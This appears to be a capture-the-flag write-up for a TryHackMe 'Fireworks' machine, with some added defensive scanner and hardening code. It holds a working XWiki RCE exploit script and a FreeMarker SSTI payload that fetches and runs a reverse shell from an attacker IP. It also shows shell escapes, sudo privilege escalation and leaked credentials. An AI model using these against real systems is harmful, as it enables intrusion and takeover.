Fireworks
TryHackMe KoTH Machine - Fireworks
Ports open -
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.5
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| -rw-r--r-- 1 0 0 236 Jul 04 11:04 employees.txt
| -rwxrwxr-x 1 0 0 2655 Jul 05 16:08 id_rsa
|_-rw-r--r-- 1 0 0 257 Jul 04 10:13 memo.txt
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:10.8.47.242
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 1
| vsFTPd 3.0.5 - secure, fast, stable
|_End of status
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 c9:9c:f1:2a:ca:83:c1:1d:54:67:2f:b7:6c:87:f7:80 (RSA)
| 256 ad:88:8b:1f:d2:f3:84:87:36:3c:9d:6d:b0:9e:31:2f (ECDSA)
|_ 256 c0:da:7d:f1:88:c3:96:74:9b:17:f6:d1:da:69:db:1a (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Music Gallery Site - PHP
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
8080/tcp open http-proxy
| http-methods:
|_ Potentially risky methods: PUT PATCH DELETE
| http-cookie-flags:
| /:
| JSESSIONID:
|_ httponly flag not set
|_http-title: Mtons
| fingerprint-strings:
| GetRequest:
| HTTP/1.1 200 OK
| Connection: close
| Set-Cookie: JSESSIONID=DTWNhWP-v2bCVm9Oc79Gn_Dc_3bITFsDZQvsgui5; path=/
| Content-Type: text/html;charset=UTF-8
| Content-Language: en-
| Date: Mon, 08 Jul 2024 22:13:45 GMT
| <!DOCTYPE html>
| <html lang="zh-CN">
| <head>
| <!--
| ------------------------------------------------------
| (mblog ASCII-art logo, garbled in the fingerprint dump)
| ------------------------------------------------------------
| version: 3.5.0
| github : https://github.com/langhsu/mblog
| ------------
| HTTPOptions:
| HTTP/1.1 200 OK
| Allow: GET,HEAD,POST,PUT,PATCH,DELETE,OPTIONS
| Connection: close
| Set-Cookie: JSESSIONID=ee2DAc--KODvY3emOORt1RYWTP9eH1EVV0bMi-cg; path=/
| Content-Length: 0
|_ Date: Mon, 08 Jul 2024 22:13:46 GMT
9999/tcp open http Werkzeug httpd 0.16.1 (Python 3.8.10)
|_http-title: Site doesn't have a title (text/html; charset=utf-8).
|_http-server-header: Werkzeug/0.16.1 Python/3.8.10
Found an id_rsa private ssh key via ftp
cracked pass for key - trustno1
ssh2john id_rsa > forjohn
john forjohn -w=/usr/share/wordlists/rockyou.txt
Searching for music gallery site exploit
https://github.com/navaidzansari/CVE_Demo/blob/main/2023/Music%20Gallery%20Site%20-%20SQL%20Injection%201.md
Exploiting SQLi on endpoint /classes/Master.php - it might be a different endpoint, it's random. Box even has a broken access control vuln; every PoC you can find is in the link above
GET /classes/Master.php?f=get_music_details&id=1* HTTP/1.1
Host: 10.10.91.230
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Cookie: PHPSESSID=rat59huouim1urikmd93jonrtc
Upgrade-Insecure-Requests: 1
sqlmap -r req.txt --dbs
got admin hash after dumping the db
admin:Atarea51
LFI after admin dashboard access -
http://10.10.91.230/admin/?page=/etc/passwd
Initial foothold on the box as david
user - david
ssh -i id_rsa david@ip
key passphrase - trustno1
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
systemd-timesync:x:102:104:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:106::/nonexistent:/usr/sbin/nologin
syslog:x:104:110::/home/syslog:/usr/sbin/nologin
_apt:x:105:65534::/nonexistent:/usr/sbin/nologin
tss:x:106:111:TPM software stack,,,:/var/lib/tpm:/bin/false
uuidd:x:107:112::/run/uuidd:/usr/sbin/nologin
tcpdump:x:108:113::/nonexistent:/usr/sbin/nologin
sshd:x:109:65534::/run/sshd:/usr/sbin/nologin
landscape:x:110:115::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:111:1::/var/cache/pollinate:/bin/false
ec2-instance-connect:x:112:65534::/nonexistent:/usr/sbin/nologin
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
ubuntu:x:1000:1000:Ubuntu:/home/ubuntu:/bin/bash
lxd:x:998:100::/var/snap/lxd/common/lxd:/bin/false
mysql:x:113:119:MySQL Server,,,:/nonexistent:/bin/false
dnsmasq:x:114:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
david:x:1001:1001:David Levinson,,,:/home/david:/usr/bin/fireshell
thomas:x:1002:1002:Thomas J Whitmore,,,:/home/thomas:/bin/bash
steven:x:1003:1003:Steven Hiller,,,:/home/steven:/bin/bash
ftp:x:115:122:ftp daemon,,,:/srv/ftp:/usr/sbin/nologin
Escape the fireshell - notes
^R^X
reset; bash 1>&0 2>&0
privesc to root -
TF=$(mktemp)
echo 'os.execute("/bin/bash")' > $TF
sudo nmap --script=$TF
Fireshell
#!/usr/bin/python3
import os
import subprocess
import shlex
from cmd import Cmd

HOMEDIR = os.path.expanduser(os.path.normpath('~'))
os.chdir(HOMEDIR)

class MyPrompt(Cmd):
    prompt = "fireshell>> "
    intro = "Welcome to fireshell :) input 'help' for a list of available commands. Powered by python Cmd!"

    def onecmd(self, line):
        try:
            return super().onecmd(line)
        except Exception as e:
            print(f"{e}")
            return False  # don't stop

    def do_exit(self, inp):
        print("Bye")
        return True

    def help_exit(self):
        print("Close this session")

    def default(self, inp):
        if inp == "q":
            return self.do_exit(inp)
        print("Default: {}".format(inp))

    def do_pwd(self, arg):
        res = subprocess.run('pwd', shell=True, text=True, capture_output=True).stdout
        print(res)

    def do_echo(self, arg):
        args = shlex.split(arg)
        res = subprocess.run(['echo', *args], text=True, capture_output=True).stdout
        print(res)

    def do_ls(self, arg):
        res = subprocess.run(['ls', HOMEDIR], text=True, capture_output=True).stdout
        print(res)

    def do_cat(self, arg):
        args = shlex.split(arg)
        if args[0][0] == '/':
            fname = args[0]
        else:
            fname = '~/' + args[0]
        fname = os.path.expanduser(os.path.normpath(fname))
        print(fname)
        if fname.startswith(HOMEDIR):
            res = subprocess.run(['cat', fname], text=True, capture_output=True).stdout
            print(res)
        else:
            print('You can only access files on the safe directory.')

    def do_ping(self, arg):
        args = shlex.split(arg)
        res = subprocess.run(['ping', '-c4', args[0]], text=True, capture_output=True)
        print(res.stderr)
        print(res.stdout)

    def do_notes(self, arg):
        # spawns an interactive editor through a shell with SHELL set: this is the ^R^X escape used above
        my_env = {**os.environ, 'SHELL': '/usr/bin/bash'}
        res = subprocess.call('nano ' + HOMEDIR + '/notes.txt', shell=True, text=True, env=my_env)

    def do_monitor(self, arg):
        # top is interactive as well
        res = subprocess.call('top', shell=True, text=True)

    def do_shell(self, arg):
        print('Currently disabled for security reasons...')

if __name__ == "__main__":
    MyPrompt().cmdloop()
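Added example, not the box's fireshell: how the commands the escapes above rely on can be written without ever handing the user an interactive program (notes becomes a read-only file read, monitor a one-shot ps, cat a containment check with os.path.commonpath). SaferPrompt, resolve_in_home and safe_cat are my names, not anything from the machine.

```python
import os, subprocess
from cmd import Cmd
HOMEDIR = os.path.realpath(os.path.expanduser("~"))

def resolve_in_home(arg: str, home: str = HOMEDIR) -> "str | None":
    """Resolved path if it stays under `home`, else None. commonpath() compares
    whole components, so "..", symlinks and a sibling like home+"2" are rejected."""
    home = os.path.realpath(home)
    candidate = arg if arg.startswith("/") else os.path.join(home, arg)
    resolved = os.path.realpath(candidate)
    try:
        return resolved if os.path.commonpath([home, resolved]) == home else None
    except ValueError:  # different drives; only possible on Windows
        return None

def safe_cat(arg: str, home: str = HOMEDIR) -> str:
    """What do_cat should do: containment check first, then a plain read, no subprocess."""
    path = resolve_in_home(arg.strip(), home)
    if path is None:
        return "You can only access files in your home directory."
    try:
        with open(path, "r", errors="replace") as fh:
            return fh.read()
    except OSError as exc:
        return f"cannot read {path}: {exc.strerror}"

def process_snapshot(rows: int = 15) -> str:
    """One-shot stand-in for `top`: argv list, no shell, nothing interactive."""
    out = subprocess.run(["ps", "-eo", "pid,user,pcpu,pmem,comm", "--sort=-pcpu"],
                         text=True, capture_output=True, check=False)
    return "\n".join(out.stdout.splitlines()[:rows])

class SaferPrompt(Cmd):
    prompt = "fireshell>> "
    def do_cat(self, arg):
        print(safe_cat(arg))
    def do_notes(self, arg):          # read-only: no nano, no SHELL environment, no tty program
        print(safe_cat("notes.txt"))
    def do_monitor(self, arg):
        print(process_snapshot())
    def do_exit(self, arg):
        return True

if __name__ == "__main__":
    SaferPrompt().cmdloop()
```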
Port 8080 - mblog
<!--
------------------------------------------------------
_____ ______ ________ ___ ________ ________
|\ _ \ _ \|\ __ \|\ \ |\ __ \|\ ____\
\ \ \\\__\ \ \ \ \|\ /\ \ \ \ \ \|\ \ \ \___|
\ \ \\|__| \ \ \ __ \ \ \ \ \ \\\ \ \ \ ___
\ \ \ \ \ \ \ \|\ \ \ \____\ \ \\\ \ \ \|\ \
\ \__\ \ \__\ \_______\ \_______\ \_______\ \_______\
\|__| \|__|\|_______|\|_______|\|_______|\|_______|
------------------------------------------------------------
version: 3.5.0
github : https://github.com/langhsu/mblog
------------------------------------------------------------
-->
https://gitee.com/mtons/mblog
Default admin creds for mblog 3.5.0 - admin:12345
SSTI - CVE-2024-28713
https://github.com/JiangXiaoBaiJia/cve/blob/main/Mblog%20blog%20system%20has%20SSTI%20template%20injection%20vulnerability.md
https://www.vicarius.io/vsociety/posts/ssti-in-mblog-351-a-tale-of-a-glorified-rce-cve-2024-28713-novel-exploit
index.ftl -
<#include "/default/inc/layout.ftl"/>
<#assign topId = 1 >>>
<#assign ex="freemarker.template.utility.Execute"?new()>${ex("wget http://10.8.47.242/revshell.sh")}
<#assign ex="freemarker.template.utility.Execute"?new()>${ex("bash revshell.sh")}
<@layout.extends name="/inc/layout.ftl">
<@layout.put block="contents">
<#assign topId = 1 />
<!-- top -->
<div class="row">
<@contents channelId=topId size=8>
python3 mblog_ssti.py --url http://10.10.221.203:8080/ --username admin --password 12345 --theme-template-path voldemort/hoodtemp/vold.zip
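Added example, not part of the writeup or of mblog: a scanner that a theme-upload hook or reviewer could run over .ftl files to refuse the ?new() construct CVE-2024-28713 relies on, using the shape of index.ftl above as a constructed sample. scan_template and is_safe_theme are my names.

```python
import re
from typing import List, Tuple

# FreeMarker utility classes that reach the JVM or a shell from template code.
DANGEROUS_CLASSES = (
    "freemarker.template.utility.Execute",
    "freemarker.template.utility.ObjectConstructor",
    "freemarker.template.utility.JythonRuntime",
)
NEW_BUILTIN = re.compile(r"\?\s*new\s*\(")   # the ?new() built-in
API_BUILTIN = re.compile(r"\?\s*api\b")        # ?api exposes raw Java methods
# A quoted literal naming one of the classes, tolerating stray whitespace
# (one copy of the payload on this page reads "utility. Execute").
QUOTE = "['\"]"
CLASS_LITERAL = re.compile(QUOTE + r"\s*(" + "|".join(
    r"\s*\.\s*".join(map(re.escape, name.split("."))) for name in DANGEROUS_CLASSES
) + r")\s*" + QUOTE)

def scan_template(source: str) -> List[Tuple[int, str]]:
    """Return (line_number, reason) for every suspicious line of a .ftl file."""
    findings = []
    for lineno, line in enumerate(source.splitlines(), start=1):
        hit = CLASS_LITERAL.search(line)
        if hit and NEW_BUILTIN.search(line):
            findings.append((lineno, "?new() on " + "".join(hit.group(1).split())))
        elif hit:
            findings.append((lineno, "reference to a JVM-executing utility class"))
        if API_BUILTIN.search(line):
            findings.append((lineno, "?api built-in used"))
    return findings

def is_safe_theme(source: str) -> bool:
    """Upload-hook decision: accept the theme only if the scanner is silent."""
    return not scan_template(source)

# Constructed sample: benign layout lines from index.ftl above plus one injected
# line of the same shape as the page's payload, with the command replaced by `id`.
SAMPLE = (
    '<#include "/default/inc/layout.ftl"/>\n'
    '<#assign topId = 1 />\n'
    '<#assign ex="freemarker.template.utility.Execute"?new()>${ex("id")}\n'
    '<@layout.extends name="/inc/layout.ftl">\n'
)

if __name__ == "__main__":
    for lineno, reason in scan_template(SAMPLE):
        print(f"line {lineno}: {reason}")
```

The server-side fix is FreeMarker's own Configuration.setNewBuiltinClassResolver(TemplateClassResolver.SAFER_RESOLVER), which refuses exactly these three classes at ?new() time; the scanner only mirrors that list for templates arriving through an upload.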
Mysql db root pass -
root:Password321
debian-sys-maint:qjBwvEtYOe5gvPGb
XWiki on port 8080 -
8080/tcp open http-proxy
| http-title: Home - XWiki
|_Requested resource was bin/view/Main/
| fingerprint-strings:
| FourOhFourRequest:
| HTTP/1.1 404
| Content-Script-Type: text/javascript
| Set-Cookie: JSESSIONID=F72192932FE1B317F1B4B4C7B45E9075; Path=/; HttpOnly
| Pragma: no-cache
| Cache-Control: no-cache
| Expires: Wed, 31 Dec 1969 23:59:59 GMT
| Content-Type: text/html;charset=UTF-8
| Content-Language: en
| Content-Length: 35030
| Date: Tue, 09 Jul 2024 17:58:43 GMT
| Connection: close
| <!DOCTYPE html>
| <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" data-xwiki-paged-media="paper" data-xwiki-reference="xwiki:Main.DocumentDoesNotExist.WebHome" data-xwiki-document="Main.DocumentDoesNotExist.WebHome" data-xwiki-wiki="xwiki" data-xwiki-space="Main.DocumentDoesNotExist" data-xwiki-page="WebHome" data-xwiki-isnew="true" data-xwiki-version="1.1" data-xwiki-rest-url="/rest/wikis/xwiki/spaces/Main/spaces/DocumentDoesNotExist/pages/WebHome" data-xwiki-locale="" data-xwiki-form-token="G
| GetRequest:
| HTTP/1.1 302
| Content-Script-Type: text/javascript
| Location: http://localhost:8080/bin/view/Main/
| Content-Length: 0
| Date: Tue, 09 Jul 2024 17:58:39 GMT
| Connection: close
| HTTPOptions:
| HTTP/1.1 200
| Content-Script-Type: text/javascript
| Allow: GET, HEAD, TRACE, OPTIONS
| Content-Length: 0
| Date: Tue, 09 Jul 2024 17:58:39 GMT
| Connection: close
| RTSPRequest:
| HTTP/1.1 400
| Content-Type: text/html;charset=utf-8
| Content-Language: en
| Content-Length: 1924
| Date: Tue, 09 Jul 2024 17:58:39 GMT
| Connection: close
| <!doctype html><html lang="en"><head><title>HTTP Status 400
| Request</title><style type="text/css">body {font-family:Tahoma,Arial,sans-serif;} h1, h2, h3, b {color:white;background-color:#525D76;} h1 {font-size:22px;} h2 {font-size:16px;} h3 {font-size:14px;} p {font-size:12px;} a {color:black;} .line {height:1px;background-color:#525D76;border:none;}</style></head><body><h1>HTTP Status 400
|_ Request</h1><hr class="line" /><p><b>Type</b> Exception Report</p><p><b>Message</b> Invalid character found in the HTTP protocol [RTSP/1.00x0d0x0a0x0d0x0a...]</p><p><b>Description</b> The server cannot or will not process the request due to something that is perceived to be a client error (e.g., malformed request syntax, invalid
| http-methods:
|_ Potentially risky methods: TRACE
|_http-open-proxy: Proxy might be redirecting requests
Default admin creds -
admin:admin123
XWiki RCE (CVE-2024-31982) - exploit
https://www.vicarius.io/vsociety/posts/xwiki-rce-cve-2024-31982-exploit
import sys
import requests
import argparse
import re
import urllib3
import urllib.parse
from requests.exceptions import RequestException

urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

VULNERABLE_ENDPOINT = "/bin/get/Main/DatabaseSearch?outputSyntax=plain&space=&text="

def extract_description(text):
    pattern = r'<description>RSS feed for search on \}\}\}(.*?)</description>'
    matches = re.findall(pattern, text, re.DOTALL)
    if matches:
        return matches[0]
    else:
        print("No text found in the response.")
        return None

def make_request(url):
    try:
        response = requests.get(url, verify=False, timeout=50)  # Skip SSL verification for simplicity
        if response.status_code == 200:
            return response.text
        else:
            return None
    except RequestException:
        return None

def test_host(url, cmd):
    try:
        groovy_cmd = (
            "def sout = new StringBuilder(), serr = new StringBuilder(); "
            "def proc = '{cmd}'.execute(); proc.consumeProcessOutput(sout, serr); "
            "proc.waitForOrKill(1000); println \"$sout\";".format(cmd=cmd)
        )
        payload = '}}}{{async async=false}}{{groovy}}' + groovy_cmd + '{{/groovy}}{{/async}}'
        encoded_payload = urllib.parse.quote_plus(payload).replace('>', '<')
        fullurl = f"{url}{VULNERABLE_ENDPOINT}{encoded_payload}"
        body = make_request(fullurl)
        if body:
            extracted_text = extract_description(body)
            if extracted_text:
                print(extracted_text)
    except RequestException:
        print(f"Timeout: {url}")

if __name__ == '__main__':
    parser = argparse.ArgumentParser(description='POC for CVE-2024-31982: XWiki Platform Remote Code Execution.')
    parser.add_argument('-u', '--url', required=True, help='Target URL (e.g., http://target)')
    parser.add_argument('-c', '--cmd', required=True, help='Cmd to run')
    args = parser.parse_args()
    test_host(args.url, args.cmd)
python3 xwiki_rce.py -u http://10.10.145.232:8080 -c "wget 10.8.47.242/vold.sh"
python3 xwiki_rce.py -u http://10.10.145.232:8080 -c "chmod +x vold.sh"
python3 xwiki_rce.py -u http://10.10.145.232:8080 -c "./vold.sh"
ls -l /root/id_rsa
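Added detection example, not from the writeup or the PoC: parse access-log lines and flag DatabaseSearch requests whose text parameter carries the }}} verbatim break and script macros the PoC above sends. The log lines are constructed, and LOG_RE assumes Tomcat/Apache common log format.

```python
import re
from typing import List, Optional
from urllib.parse import parse_qs, unquote_plus, urlsplit

# Common/combined log prefix: client ident user [time] "METHOD target PROTO" status
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)
# Script macros that the {{{verbatim}}} wrapper around the search text should neutralise
MACRO_RE = re.compile(r"\{\{\s*/?\s*(groovy|async|velocity|python|script)\b", re.I)

def classify(line: str) -> Optional[dict]:
    """Finding for a DatabaseSearch request whose `text` carries macro syntax, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m.group("target"))
    if not parts.path.endswith("/DatabaseSearch"):
        return None
    text = parse_qs(parts.query).get("text", [""])[0]
    text = unquote_plus(text)  # second decode: proxies may re-encode the PoC's quote_plus output
    macros = sorted({x.lower() for x in MACRO_RE.findall(text)})
    breaks_verbatim = "}}}" in text
    if not macros and not breaks_verbatim:
        return None
    return {"ip": m.group("ip"), "time": m.group("ts"), "status": int(m.group("status")),
            "macros": macros, "breaks_verbatim": breaks_verbatim}

def scan(lines: List[str]) -> List[dict]:
    return [f for f in map(classify, lines) if f]

# Constructed sample lines: one request shaped like the PoC above (its payload,
# URL-encoded, running `println "hi"`), one ordinary search, one page view.
SAMPLE_LOG = [
    '10.8.47.242 - - [09/Jul/2024:18:01:02 +0000] "GET /bin/get/Main/DatabaseSearch'
    '?outputSyntax=plain&space=&text=%7D%7D%7D%7B%7Basync+async%3Dfalse%7D%7D%7B%7Bgroovy%7D%7D'
    'println+%22hi%22%7B%7B%2Fgroovy%7D%7D%7B%7B%2Fasync%7D%7D HTTP/1.1" 200 1532',
    '10.8.47.242 - - [09/Jul/2024:18:00:10 +0000] "GET /bin/get/Main/DatabaseSearch'
    '?outputSyntax=plain&space=&text=fireworks HTTP/1.1" 200 880',
    '10.8.47.242 - - [09/Jul/2024:18:00:11 +0000] "GET /bin/view/Main/ HTTP/1.1" 200 35030',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```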
Thomas user from docker -
sudo vim /etc/hosts
:!/bin/bash
username="tomcat" password="s3cret"
Fireshell 3 - escape less
notes
!/bin/bash
Magento 2.4.6 - Bitnami on port 8080 -
'db' => [
'table_prefix' => '',
'connection' => [
'default' => [
'host' => 'mariadb:3306',
'dbname' => 'bitnami_magento',
'username' => 'bn_magento',
'password' => 'Shopaholic47',
'model' => 'mysql4',
'engine' => 'innodb',
'initStatements' => 'SET NAMES utf8;',
'active' => '1',
'driver_options' => [
1014 => false
]
]
]
+-------------+---------+-------------------------------------------------------------------------------------------------------------------+
| password_id | user_id | password_hash |
+-------------+---------+-------------------------------------------------------------------------------------------------------------------+
| 1 | 1 | bc88e499a457950a30200af2ebc6127227a0026a9de2b20908f58aadaa269dcf:3D49Qomw5wtDm4ibNpTzIzMufvJJhFq2:3_32_2_67108864 |
| 2 | 2 | abd404f51885e94e0217d6620b80f782706eb299c461189d18de3772165bea54:16y3e0yCyuwFUVLvi4chSeSNYZ5biG9m:3_32_2_67108864 |
| 3 | 2 | 21664bec41130a45ac6ae202cc7a75a5f24f394beffabe66bdaa1a540b178376:ErJZDzUBi9ls9MULLlcKQdZ3SccSUnsJ:3_32_2_67108864 | -> admin
+-------------+---------+-------------------------------------------------------------------------------------------------------------------+
JWT cryptographic key in /bitnami/magento/app/etc/env.php -
fd20f5db49b9e1710d973d197888dc08
XXE Magento -
https://github.com/bigb0x/CVE-2024-34102/blob/main/cve-2024-34102.py
Thomas id_rsa path
/bitnami/magento/pub/media/downloadable/files/links/i/d/id_rsa
Grep pattern to search for flags (case-insensitive, closed brace so only the flag itself is printed) -
grep -RioE "thm\{[^}]*\}" 2>/dev/null